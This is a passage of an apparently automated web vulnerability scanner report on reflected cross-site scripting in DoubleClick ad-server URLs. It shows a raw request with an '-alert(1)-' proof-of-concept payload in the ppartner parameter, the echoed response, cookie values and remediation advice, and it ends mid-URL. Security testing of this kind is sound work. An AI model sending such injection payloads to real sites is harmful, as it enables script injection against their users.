Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100801e3"-alert(1)-"324ce86438a&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http
...[SNIP]...

3.210. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fedf"-alert(1)-"f027a765496 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=5fedf"-alert(1)-"f027a765496&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&